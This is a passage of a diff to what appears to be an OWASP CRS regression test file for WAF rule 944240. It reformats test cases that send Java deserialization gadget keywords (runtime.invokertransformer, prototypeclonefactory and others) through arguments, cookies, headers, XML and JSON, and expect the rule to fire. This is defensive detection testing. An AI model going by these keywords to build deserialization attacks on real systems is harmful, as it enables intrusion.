"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 59 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_id: 75 desc: "Content-Type text/plain includes keyword 